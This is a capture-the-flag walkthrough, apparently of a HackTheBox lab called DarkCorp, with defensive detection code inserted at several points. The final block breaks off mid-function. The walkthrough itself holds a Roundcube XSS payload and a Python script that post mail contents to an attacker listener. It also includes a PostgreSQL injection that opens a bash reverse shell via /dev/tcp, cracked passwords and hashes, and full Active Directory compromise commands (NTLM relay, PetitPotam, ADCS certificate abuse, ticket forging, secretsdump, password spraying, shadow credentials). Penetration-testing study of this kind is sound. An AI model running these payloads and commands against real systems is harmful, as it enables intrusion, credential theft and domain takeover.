Basic info

Port scan

22 and 80:

$ nmap -sC -sV -Pn 10.10.11.54
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-10 13:30 CST
Nmap scan report for 10.10.11.54
Host is up (0.23s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 33:41:ed:0a:a5:1a:86:d0:cc:2a:a6:2b:8d:8d:b2:ad (ECDSA)
|_ 256 04:ad:7e:ba:11:0e:e0:fb:d0:80:d3:24:c2:3e:2c:c5 (ED25519)
80/tcp open http nginx 1.22.1
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 139.27 seconds

80

Need to add a hosts entry:

10.10.11.54 drip.htb

It's DripMail; from the page content we can tell it runs Roundcube:

Roundcube Webmail

Register and log in. The login page is on the mail subdomain (add that to hosts too); it shows Roundcube Webmail 1.6.7:

A search turns up a related vulnerability:

contact

It's an XSS, so someone has to read the mail for it to trigger. We have a mailbox account but no recipient information. Back on the main site, the contact-us form can send mail, and there should be a bot that reads it automatically:

The recipient sent here is support; it can be changed to our own mailbox, and then we can see the automatically appended mail signature:

bcase xss

Now we know the target user should be bcase, so on to the XSS part. Still via the contact form, change recipient to bcase; content is text, change it to html; URL-encode the payload:

<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=document.body.appendChild(Object.assign(document.createElement('script'),{src:'http://10.10.14.8:7777/?c='+document.cookie})) foo=bar">Foo</body>

We see the callback, but since the cookie is HttpOnly, it isn't that simple.
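From the defender's side, the payload above works by hiding a style= and an on...= handler inside the value of another attribute, so a mail sanitiser has to look inside attribute values, not just at attribute names. The following is an added example (not code from the write-up or from Roundcube) of such a check built on the standard-library HTML parser: it drops event-handler attributes, attribute values that smuggle another attribute assignment, and script-like tags, and records every removal so the result can be logged. The two sample bodies are constructed here; the first only mimics the shape of the payload, with a harmless alert in place of the callback.

```python
import re
from html.parser import HTMLParser

# Attribute names that are JavaScript event handlers (onload, onanimationstart, ...).
EVENT_ATTR = re.compile(r"^on[a-z]+$", re.I)
# An attribute *value* that itself contains something shaped like another
# attribute assignment; this is how a style= and an on...= handler can be
# hidden inside a harmless-looking name= or title= attribute.
SMUGGLED_ATTR = re.compile(r"(?:^|[\s\"'])(?:on[a-z]+|style|src|href|srcdoc)\s*=", re.I)
# Tags that never belong in a rendered mail body.
DANGEROUS_TAGS = {"script", "iframe", "object", "embed"}


class MailHtmlAuditor(HTMLParser):
    """Walks an HTML mail, records what it removes, and re-serialises the rest."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []     # (tag, attribute or None, reason)
        self.out = []          # sanitised fragments
        self._skip_depth = 0   # > 0 while inside a dropped tag

    def handle_starttag(self, tag, attrs):
        if tag in DANGEROUS_TAGS:
            self.findings.append((tag, None, "dangerous tag removed"))
            self._skip_depth += 1
            return
        if self._skip_depth:
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if EVENT_ATTR.match(name):
                self.findings.append((tag, name, "event handler removed"))
            elif SMUGGLED_ATTR.search(value):
                self.findings.append((tag, name, "attribute value smuggles another attribute"))
            else:
                kept.append((name, value))
        rendered = "".join(' %s="%s"' % (n, v.replace('"', "&quot;")) for n, v in kept)
        self.out.append("<%s%s>" % (tag, rendered))

    def handle_endtag(self, tag):
        if tag in DANGEROUS_TAGS:
            if self._skip_depth:
                self._skip_depth -= 1
            return
        if not self._skip_depth:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self._skip_depth:
            self.out.append(data)


def audit_mail_html(raw_html):
    """Return (sanitised_html, findings) for one HTML mail body."""
    auditor = MailHtmlAuditor()
    auditor.feed(raw_html)
    auditor.close()
    return "".join(auditor.out), auditor.findings


# Constructed samples (not real mail): the first mimics the attribute-smuggling
# shape used in this write-up with a harmless alert, the second is an ordinary
# newsletter fragment that must survive untouched.
SMUGGLED_SAMPLE = ('<body title="bgcolor=foo" name="bar style=animation-name:x '
                   'onanimationstart=alert(1) foo=bar">Hi</body>')
BENIGN_SAMPLE = '<p style="color:red">Hello <a href="https://example.com">link</a></p>'

if __name__ == "__main__":
    for sample in (SMUGGLED_SAMPLE, BENIGN_SAMPLE):
        cleaned, findings = audit_mail_html(sample)
        print(cleaned)
        for finding in findings:
            print("  flagged:", finding)
```

The point of the second regex is that the dangerous content never appears as an attribute name at parse time; a sanitiser that only whitelists attribute names and then re-serialises values without quoting them properly is exactly what turns a quoted value back into live attributes. Logging the findings per message also gives a cheap detection signal for mass-mailed payloads of this kind.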

oswe time

Next it's OSWE time. This closely resembles the course module case "Atmail Mail Server Appliance: from XSS to RCE", except here the cookie is HttpOnly. Reading mail through the XSS, the mail with id 2 mentions an Analytics dashboard and says a password reset is required before logging in:

dev-a3f1-01.drip.htb

dev-a3f1-01.drip.htb

So: request a password reset, read the mail via XSS to get the reset link, reset and log in.

mail_xss.py

import requests
from http.server import BaseHTTPRequestHandler, HTTPServer
import base64
import threading
import time
from lxml import html


# Configuration
TARGET_URL = 'http://drip.htb/contact'
LISTEN_PORT = 7777
LISTEN_IP = '0.0.0.0'

# Payload for the POST request: the injected handler fetches the mail with the
# given uid from Roundcube and sends the page, base64-encoded, back to our listener
start_mesg = '<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=fetch(\'/?_task=mail&_action=show&_uid='
message = 3
end_mesg = '&_mbox=INBOX&_extwin=1\').then(r=>r.text()).then(t=>fetch(`http://10.10.14.8:7777/c=${btoa(t)}`)) foo=bar">Foo</body>'

post_data = {
    'name': 'miao',
    'email': 'miao',
    'message': f"{start_mesg}{message}{end_mesg}",
    'content': 'html',
    'recipient': 'bcase@drip.htb'
}
print(f"{start_mesg}{message}{end_mesg}")

# Headers for the POST request
headers = {
    'Host': 'drip.htb',
    'Cache-Control': 'max-age=0',
    'Upgrade-Insecure-Requests': '1',
    'Origin': 'http://drip.htb',
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
    'Referer': 'http://drip.htb/index',
    'Accept-Encoding': 'gzip, deflate, br',
    'Accept-Language': 'en-US,en;q=0.9',
    'Cookie': 'session=eyJfZnJlc2giOmZhbHNlLCJjc3JmX3Rva2VuIjoiNGFhNWFlNjRmMmQ4YWJkNTFjN2U4ZWEyODhmNjdiNzQ2MmIyNjY0YSJ9.Z6mM1Q.SGDZnbTJ7f5miJxHruNLwjD_fhI',
    'Connection': 'close'
}

# Function to send the POST request
def send_post():
    response = requests.post(TARGET_URL, data=post_data, headers=headers)
    print(f"[+] POST Request Sent! Status Code: {response.status_code}")

# Custom HTTP request handler to capture and decode the incoming data
class RequestHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if '/c=' in self.path:
            encoded_data = self.path.split('/c=')[1]
            decoded_data = base64.b64decode(encoded_data).decode('latin-1')
            # print(f"[+] Received data {decoded_data}")
            tree = html.fromstring(decoded_data)

            # XPath query to find the div with id 'messagebody'
            message_body = tree.xpath('//div[@id="messagebody"]')

            # Check if the div exists and extract the content
            if message_body:
                # Extract inner text, preserving line breaks
                message_text = message_body[0].text_content().strip()
                print("[+] Extracted Message Body Content:\n")
                print(message_text)
            else:
                print("[!] No div with id 'messagebody' found.")

        else:
            print("[!] Received request but no data found.")

        self.send_response(200)
        self.end_headers()
        self.wfile.write(b'OK')

    def log_message(self, format, *args):
        return  # Suppress default logging

# Function to start the HTTP server
def start_server():
    server_address = (LISTEN_IP, LISTEN_PORT)
    httpd = HTTPServer(server_address, RequestHandler)
    print(f"[+] Listening on port {LISTEN_PORT} for exfiltrated data...")
    httpd.serve_forever()

# Run the HTTP server in a separate thread
server_thread = threading.Thread(target=start_server)
server_thread.daemon = True
server_thread.start()

# Send the POST request
send_post()

# Keep the main thread alive to continue listening (sleep instead of a busy loop)
try:
    while True:
        time.sleep(1)
except KeyboardInterrupt:
    print("\n[+] Stopping server.")

dev-a3f1-01

Testing the search function: random input produces an error, and the SQL statement shown uses our input, so there may be SQL injection:

SQL injection

Confirm the injection exists and identify the backend as PostgreSQL:

'aaa' or 1=1
'aaa' or 1=2

'aaa';SELECT version()--

Some pg functions can be used directly:

''; SELECT pg_read_file('/etc/passwd', 0, 1000);

sql to rce

pg can execute commands directly; there is some filtering, which encoding gets around:

'';DO $$
DECLARE
c text;
BEGIN
c := CHR(67) || CHR(79) || CHR(80) || CHR(89) || ' (SELECT '''') to program ''bash -c "bash -i >& /dev/tcp/10.10.14.8/4444 0>&1"''';
EXECUTE c;
END $$;
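The three probes above (tautology, stacked query with pg_read_file, and the CHR()-assembled COPY ... TO PROGRAM) all end up verbatim in the PostgreSQL statement log when log_statement or log_min_error_statement is on, so they are detectable after the fact. Below is an added example (not from the write-up) of a small log analyser: it expands CHR(n) calls and joins the concatenated literals so the obfuscated keyword reads as COPY again, then applies a few patterns. The log lines are constructed here in the default stderr log format; the DO block is the one from this page with a harmless `id` in place of the command.

```python
import re

# Detection patterns for PostgreSQL statement logs.
CHR_CALL = re.compile(r"\bCHR\(\s*(\d+)\s*\)", re.I)
QUOTE_CONCAT = re.compile(r"'\s*\|\|\s*'")              # 'a' || 'b'  ->  'ab'
COPY_TO_PROGRAM = re.compile(r"\bCOPY\b.*\bTO\s+PROGRAM\b", re.I | re.S)
STACKED_QUERY = re.compile(r"'\s*;\s*(?:DO|SELECT|COPY|CREATE|DROP|UPDATE|INSERT)\b", re.I)
FILE_FUNCS = re.compile(r"\b(?:pg_read_file|pg_read_binary_file|pg_ls_dir|lo_import)\s*\(", re.I)
TAUTOLOGY = re.compile(r"\bor\s+(\d+)\s*=\s*\1\b", re.I)  # 'or 1=1' but not 'or 1=2'
STATEMENT_LINE = re.compile(r"(?:LOG:\s+statement:|STATEMENT:)\s+(.*)$")


def _chr_to_literal(match):
    """CHR(67) -> 'C'; leave impossible code points untouched."""
    code = int(match.group(1))
    if code > 0x10FFFF:
        return match.group(0)
    return "'" + chr(code) + "'"


def normalize(sql):
    """Expand CHR(n) calls and join adjacent string literals so obfuscated
    keywords such as CHR(67)||CHR(79)||CHR(80)||CHR(89) read as 'COPY'."""
    expanded = CHR_CALL.sub(_chr_to_literal, sql)
    return QUOTE_CONCAT.sub("", expanded)


def analyze_statement(sql):
    """Return the list of reasons a logged statement looks like injection or RCE."""
    norm = normalize(sql)
    reasons = []
    if len(CHR_CALL.findall(sql)) >= 3:
        reasons.append("chr-obfuscated keyword")
    if COPY_TO_PROGRAM.search(norm):
        reasons.append("COPY ... TO PROGRAM (OS command execution)")
    if STACKED_QUERY.search(sql):
        reasons.append("stacked query after closing quote")
    if FILE_FUNCS.search(norm):
        reasons.append("file-system access function")
    if TAUTOLOGY.search(sql):
        reasons.append("boolean tautology")
    return reasons


def scan_log(lines):
    """Return [(statement, reasons)] for every statement found in a pg log."""
    results = []
    for line in lines:
        m = STATEMENT_LINE.search(line)
        if m:
            stmt = m.group(1)
            results.append((stmt, analyze_statement(stmt)))
    return results


# Constructed sample log (not a real capture); the DO block mirrors the one in
# this write-up with a harmless 'id' in place of the shell command.
PREFIX = "2025-02-10 18:40:0%d UTC [2211] dripmail_dba@dripmail "
SAMPLE_LOG = [
    PREFIX % 1 + "LOG:  statement: SELECT * FROM analytics WHERE name ILIKE '%drip%'",
    PREFIX % 2 + "ERROR:  syntax error at or near \"aaa\"",
    PREFIX % 2 + "STATEMENT:  SELECT * FROM analytics WHERE name ILIKE '%'aaa' or 1=1%'",
    PREFIX % 3 + "STATEMENT:  SELECT * FROM analytics WHERE name ILIKE '%'aaa' or 1=2%'",
    PREFIX % 4 + "LOG:  statement: SELECT * FROM analytics WHERE name ILIKE "
                 "'%''; SELECT pg_read_file('/etc/passwd', 0, 1000);%'",
    PREFIX % 5 + "LOG:  statement: SELECT * FROM analytics WHERE name ILIKE '%'';DO $$ "
                 "DECLARE c text; BEGIN c := CHR(67) || CHR(79) || CHR(80) || CHR(89) || "
                 "' (SELECT '''') to program ''id'''; EXECUTE c; END $$;%'",
]

if __name__ == "__main__":
    for stmt, reasons in scan_log(SAMPLE_LOG):
        print(("ALERT " if reasons else "ok    ") + stmt[:70], reasons)
```

The normalisation step is what matters: a rule that only greps for "TO PROGRAM" misses the CHR()-built variant, while the joined-literal form catches both. The real fix on the application side is parameterised queries plus a database role without superuser or pg_execute_server_program membership, so that COPY ... TO PROGRAM is refused even when injection exists.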

Got a postgres shell:

postgres

Routine file browsing; the dashboard's env gives the database credentials:

postgres@drip:/var/www/html/dashboard$ cat .env

DB_ENGINE=postgresql
DB_HOST=localhost
DB_NAME=dripmail
DB_USERNAME=dripmail_dba
DB_PASS=2Qa2SsBkQvsc
DB_PORT=5432

There's also a gpg-encrypted postgres backup in backups:

gpg

gpg decryption; the passphrase is DB_PASS:

script /dev/null -c bash

gpg --use-agent --homedir /var/lib/postgresql/.gnupg --pinentry-mode=loopback --passphrase 2Qa2SsBkQvsc --decrypt /var/backups/postgres/dev-dripmail.old.sql.gpg > dev-dripmail.old.sql

1 bcase dc5484871bc95c4eab58032884be7225 bcase@drip.htb
2 victor.r cac1c7b0e7008d67b6db40c03e76b9c0 victor.r@drip.htb
3 ebelford 8bbd7f88841b4223ae63c8848969be86 ebelford@drip.htb

The SQL dump contains some hashes; victor.r's and ebelford's passwords can be cracked:

1 bcase dc5484871bc95c4eab58032884be7225 bcase@drip.htb
2 victor.r cac1c7b0e7008d67b6db40c03e76b9c0 victor.r@drip.htb
3 ebelford 8bbd7f88841b4223ae63c8848969be86 ebelford@drip.htb

victor.r victor1gustavo@#
ebelford ThePlague61780

ebelford

SSH in with the ebelford credentials:

The hosts file shows the internal domain environment:

172.16.20.1 DC-01 DC-01.darkcorp.htb darkcorp.htb
172.16.20.3 drip.darkcorp.htb

Set up a tunnel, add hosts, and the other credential pair found earlier turns out to be a valid domain user:

ssh ebelford@10.10.11.54 -D 1080

proxychains4 netexec smb DC-01.darkcorp.htb -u victor.r -p 'victor1gustavo@#'

# sshuttle works too, but hit a bug locally: on macOS the routes weren't added after running and the firewall rules had to be flushed; fine in Kali
sudo pfctl -f /etc/pf.conf
sshuttle -v -r ebelford@10.10.11.54 172.16.20.1/24

bloodhound

Collect BloodHound data for analysis, but it failed; first collect the regular user list:

faketime -f "-16m" bloodhound-python -u victor.r -p 'victor1gustavo@#' -d darkcorp.htb -ns 172.16.20.1 --dns-tcp -c All --zip

nxc smb 172.16.20.1 -u victor.r -p 'victor1gustavo@#' --users

nxc ldap 172.16.20.1 -u victor.r -p 'victor1gustavo@#' --bloodhound --collection All

users

Administrator
Guest
krbtgt
victor.r
svc_acc
john.w
angela.w
angela.w.adm
taylor.b
taylor.b.adm
eugene.b
bryce.c

Internal port scan

Probe the two internal hosts found; uploading a static nmap is more reliable:

wget http://10.10.14.8:7777/nmap-7.91SVN-x86_64-portable.tar.gz
tar -xf nmap-7.91SVN-x86_64-portable.tar.gz

./run-nmap.sh -sC -sV 172.16.20.1 172.16.20.2

Starting Nmap 7.91SVN ( https://nmap.org ) at 2025-02-10 18:48 MST
Nmap scan report for DC-01 (172.16.20.1)
Host is up (0.00091s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 33:41:ed:0a:a5:1a:86:d0:cc:2a:a6:2b:8d:8d:b2:ad (ECDSA)
|_ 256 04:ad:7e:ba:11:0e:e0:fb:d0:80:d3:24:c2:3e:2c:c5 (ED25519)
53/tcp open domain Simple DNS Plus
80/tcp open http nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: Site doesn't have a title (text/html).
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-11 01:48:38Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkcorp.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC-01.darkcorp.htb, DNS:darkcorp.htb, DNS:darkcorp
| Not valid before: 2025-01-22T12:09:55
|_Not valid after: 2124-12-29T12:09:55
|_ssl-date: 2025-02-11T01:49:57+00:00; 0s from scanner time.
443/tcp open ssl/http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| ssl-cert: Subject: commonName=DARKCORP-DC-01-CA
| Not valid before: 2024-12-29T23:24:10
|_Not valid after: 2034-12-29T23:34:10
|_ssl-date: 2025-02-11T01:49:57+00:00; 0s from scanner time.
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkcorp.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC-01.darkcorp.htb, DNS:darkcorp.htb, DNS:darkcorp
| Not valid before: 2025-01-22T12:09:55
|_Not valid after: 2124-12-29T12:09:55
|_ssl-date: 2025-02-11T01:49:57+00:00; 0s from scanner time.
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkcorp.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC-01.darkcorp.htb, DNS:darkcorp.htb, DNS:darkcorp
| Not valid before: 2025-01-22T12:09:55
|_Not valid after: 2124-12-29T12:09:55
|_ssl-date: 2025-02-11T01:49:57+00:00; 0s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkcorp.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC-01.darkcorp.htb, DNS:darkcorp.htb, DNS:darkcorp
| Not valid before: 2025-01-22T12:09:55
|_Not valid after: 2124-12-29T12:09:55
|_ssl-date: 2025-02-11T01:49:57+00:00; 0s from scanner time.
Service Info: OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: DC-01, NetBIOS user: <unknown>, NetBIOS MAC: 00:15:5d:84:03:00 (Microsoft)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-02-11T01:49:17
|_ start_date: N/A

Nmap scan report for 172.16.20.2
Host is up (0.0026s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5000/tcp open http Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
| Negotiate
|_ NTLM
| http-ntlm-info:
| Target_Name: darkcorp
| NetBIOS_Domain_Name: darkcorp
| NetBIOS_Computer_Name: WEB-01
| DNS_Domain_Name: darkcorp.htb
| DNS_Computer_Name: WEB-01.darkcorp.htb
| DNS_Tree_Name: darkcorp.htb
|_ Product_Version: 10.0.20348
|_http-server-header: Microsoft-IIS/10.0
|_http-title: 401 - Unauthorized: Access is denied due to invalid credentials.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: WEB-01, NetBIOS user: <unknown>, NetBIOS MAC: 00:15:5d:84:03:03 (Microsoft)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-02-11T01:49:18
|_ start_date: N/A

Post-scan script results:
| clock-skew:
| 0s:
| 172.16.20.1 (DC-01)
|_ 172.16.20.2
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 90.78 seconds

20.1

Port 80 on 20.1 is the main site; 443 is the IIS default page:

20.2

Port 80 on 20.2 is the IIS default page; 5000 requires login:

Internal Status Monitor

victor.r can log in to port 5000 on 20.2; since it's a domain user, Burp needs NTLM authentication configured:

victor.r victor1gustavo@#

check

Then there's a check function, but the host is validated and can't simply be changed to our IP:

But the port isn't restricted:

(There's also an unintended command injection here)

svc_acc

So from here it's similar to the Mist machine: forward the port, run check again, and the account turns out to be svc_acc:

wget http://10.10.14.8:7777/socatx64.bin

./socatx64.bin tcp-listen:8088,reuseaddr,fork tcp:10.10.14.8:80

Can't crack it, so next try relaying. An LDAP interactive shell works, but shadow credentials aren't directly possible. However, svc_acc is a DNS admin:

python3 examples/ntlmrelayx.py -t ldap://dc-01.darkcorp.htb -i

# get_user_groups svc_acc

Relay time

Summing up: we can relay, and the account is a DNS admin, so DNS records can be added through the relay. Searching turns up a relay technique that uses DNS:

# relay to add a DNS record
python3 examples/ntlmrelayx.py -t "ldap://172.16.20.1" --no-smb-server --no-dump --no-da --no-acl --no-validate-privs --add-dns-record 'dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.10.14.5

# set up the relay to request a certificate for web01
python3 krbrelayx.py -t 'https://dc-01.darkcorp.htb/certsrv/certfnsh.asp' --adcs -v 'WEB01$'

# force web01 to access the DNS name we added
python3 PetitPotam.py -u victor.r -p 'victor1gustavo@#' -d darkcorp.htb 'dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' web-01

# web-01 certificate authentication
faketime -f "-16m" python3 ~/Tools/ADCS_Tools/PKINITtools/gettgtpkinit.py -cert-pfx 'WEB01$.pfx' 'DARKCORP.HTB/WEB-01$' WEB01.ccache
export KRB5CCNAME=./WEB01.ccache
faketime -f "-16m" python3 ~/Tools/ADCS_Tools/PKINITtools/getnthash.py -key 78ef10df6a887e91e43253bbd81c4c665c405473df6167713106a6aaec14b9aa 'darkcorp.htb/WEB-01$'

Recovered NT Hash
8f33c7fc7ff515c1f358e488fbb8b675
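The DNS record added above does not look like a hostname at all: a legitimate prefix ("dc-01") followed by a long base64 tail that is mostly encoded zero bytes. Names like that are easy to audit for, and because the record was written via LDAP by an account that is merely a DNS admin, the creation also shows up as a new dnsNode object. The following is an added example (not from the write-up or any of the tools it uses) of a name audit a defender can run over an export of dnsNode names: it checks RFC 1123 label syntax, looks for a base64-like tail that decodes to mostly NUL bytes or a long repeated-character run, and flags names that extend an existing host name. The known-host set and all names except the one taken from this page are constructed.

```python
import base64
import binascii
import re

# RFC 1123 host label: letters, digits, hyphen, no leading/trailing hyphen, <= 63 chars.
HOST_LABEL = re.compile(r"^(?!-)[a-z0-9-]{1,63}(?<!-)$", re.I)
# A trailing run of base64-alphabet characters long enough to carry a binary blob.
B64_TAIL = re.compile(r"([A-Za-z0-9+/]{24,}={0,2})$")
# 12+ identical characters in a row, e.g. AAAAAAAAAAAA (base64 of zero bytes).
REPEATED_RUN = re.compile(r"(.)\1{11,}")


def _decoded_nul_fraction(tail):
    """Base64-decode a label tail (padding restored); return the NUL-byte fraction or None."""
    padded = tail + "=" * (-len(tail) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.count(0) / len(raw) if raw else None


def audit_dns_record_names(names, known_hosts):
    """Map each dnsNode name to the list of reasons it looks suspicious (empty = fine)."""
    known = {h.lower() for h in known_hosts}
    report = {}
    for name in names:
        reasons = []
        label = name.split(".", 1)[0]
        if label.startswith("_"):
            # SRV-style labels (_ldap._tcp, ...) legitimately break the host-label rule.
            report[name] = reasons
            continue
        if not HOST_LABEL.match(label):
            reasons.append("invalid hostname label")
        m = B64_TAIL.search(label)
        nul = _decoded_nul_fraction(m.group(1)) if m else None
        if (nul is not None and nul >= 0.4) or REPEATED_RUN.search(label):
            reasons.append("base64-like blob embedded in record name")
        for host in sorted(known):
            if label.lower() != host and label.lower().startswith(host):
                reasons.append("extends existing host name '%s'" % host)
        report[name] = reasons
    return report


# Constructed inventory: the existing machine names and a few dnsNode names to test,
# including the record name that appears in this write-up.
KNOWN_HOSTS = {"dc-01", "web-01", "drip"}
PAGE_RECORD_NAME = "dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA"
SAMPLE_NAMES = ["web-01", "DC-01", "printer-03", "bad host", PAGE_RECORD_NAME, "_ldap._tcp"]

if __name__ == "__main__":
    for record, reasons in audit_dns_record_names(SAMPLE_NAMES, KNOWN_HOSTS).items():
        print(("ALERT " if reasons else "ok    ") + record, reasons)
```

Such names have no business in a production zone, so a daily diff of dnsNode objects (or alerting on Directory Service object-creation events in the DomainDnsZones partition) is a cheap control. The other half of the fix is removing unnecessary DnsAdmins membership from service accounts and requiring LDAP signing and channel binding so a relayed NTLM session cannot write to the directory in the first place.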

Unintended

The same relay method can also get the DC directly; unintended.

web-01 & user flag

With the web-01 machine hash it's the usual S4U2self:

# get the domain SID
nxc ldap dc-01.darkcorp.htb -u 'victor.r' -p 'victor1gustavo@#' --get-sid

S-1-5-21-3432610366-2163336488-3604236847

# forge a web-01 ticket
faketime -f "-16m" python3 examples/ticketer.py -nthash 8f33c7fc7ff515c1f358e488fbb8b675 -domain-sid S-1-5-21-3432610366-2163336488-3604236847 -domain darkcorp.htb -spn cifs/web-01.darkcorp.htb Administrator

# authenticate with the ticket
export KRB5CCNAME=./Administrator.ccache
faketime -f "-16m" python3 examples/wmiexec.py Administrator@web-01.darkcorp.htb -k -no-pass -debug

web-01 hashdump

faketime -f "-16m" python3 examples/secretsdump.py Administrator@web-01.darkcorp.htb -k -no-pass

Administrator:500:aad3b435b51404eeaad3b435b51404ee:88d84ec08dad123eb04a060a74053f21:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

web-01 dpapi

DPAPI gives web01's local administrator password

nxc smb web-01.darkcorp.htb -u Administrator -H 88d84ec08dad123eb04a060a74053f21 --local-auth --dpapi

SMB 172.16.20.2 445 WEB-01 [SYSTEM][CREDENTIAL] Domain:batch=TaskScheduler:Task:{7D87899F-85ED-49EC-B9C3-8249D246D1D6} - WEB-01\Administrator:But_Lying_Aid9!

This one is incomplete and needs confirming on the box. SharpDPAPI shows an encrypted file whose master key can't be found automatically, so it needs manual handling:

Following the offline DPAPI handling from Vintage, we get another password:

32B2774DF751FF7E28E78AE75C237A1E
6037d071-cac5-481e-9e08-c4296c0a7ff7


python3 ~/Tools/impacket/impacket_main/examples/dpapi.py masterkey -file 6037d071-cac5-481e-9e08-c4296c0a7ff7 -sid S-1-5-21-2988385993-1727309239-2541228647-500 -password 'But_Lying_Aid9!'
python3 ~/Tools/impacket/impacket_main/examples/dpapi.py credential -file 32B2774DF751FF7E28E78AE75C237A1E -key 0xac7861aa1f899a92f7d8895b96056a76c580515d8a4e71668bc29627f6e9f38ea289420db75c6f85daac34aba33048af683153b5cfe50dd9945a1be5ab1fe6da

Username : Administrator
Unknown : Pack_Beneath_Solid9!

john.w

Spray the obtained password; john.w reuses it:

nxc ldap 172.16.20.1 -u users.txt -p 'Pack_Beneath_Solid9!'  --continue-on-success

LDAP 172.16.20.1 389 DC-01 [+] darkcorp.htb\john.w:Pack_Beneath_Solid9!

angela.w

john.w has GenericWrite over angela.w, so go straight to shadow credentials:

faketime -f "-16m" certipy shadow auto -u john.w@darkcorp.htb -p 'Pack_Beneath_Solid9!' -dc-ip 172.16.20.1 -ns 172.16.20.1 -target dc-01.darkcorp.htb -account angela.w

[*] NT hash for 'angela.w': 957246c8137069bca672dc6aa0af7c7a

Linux_Admins

angela.w's admin account angela.w.adm is a member of Linux_Admins; Linux with Kerberos authentication is usually sssd with GSSAPI:

So use john.w to change angela.w's UPN, then generate a ticket and log in to Linux:

$ python3 powerview.py john.w:'Pack_Beneath_Solid9!'@darkcorp.htb

PV > Set-DomainObject -Identity angela.w -Set userPrincipalName=angela.w.adm

faketime -f "-16m" python3 examples/getTGT.py darkcorp.htb/angela.w.adm -hashes :957246c8137069bca672dc6aa0af7c7a -principalType NT_ENTERPRISE
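The step above works because a TGT request with NT_ENTERPRISE principal type is matched against userPrincipalName, so writing another account's logon name into angela.w's UPN (with no realm suffix) lets angela.w's key obtain a ticket in angela.w.adm's name. Both conditions are simple to audit for. The following is an added example (not from the write-up) that runs over a list of user objects as a defender would export them and reports UPNs without a realm, UPNs whose prefix belongs to a different sAMAccountName, and UPNs that merely differ from their own account name; the user records are constructed.

```python
def find_upn_anomalies(users):
    """users: list of dicts with sAMAccountName and userPrincipalName.
    Returns a list of (sAMAccountName, userPrincipalName, reason), in input order."""
    by_sam = {u["sAMAccountName"].lower(): u["sAMAccountName"] for u in users}
    findings = []
    for u in users:
        sam = u["sAMAccountName"]
        upn = u.get("userPrincipalName") or ""
        if not upn:
            continue  # accounts without a UPN cannot be targeted this way
        prefix, sep, _realm = upn.partition("@")
        if not sep:
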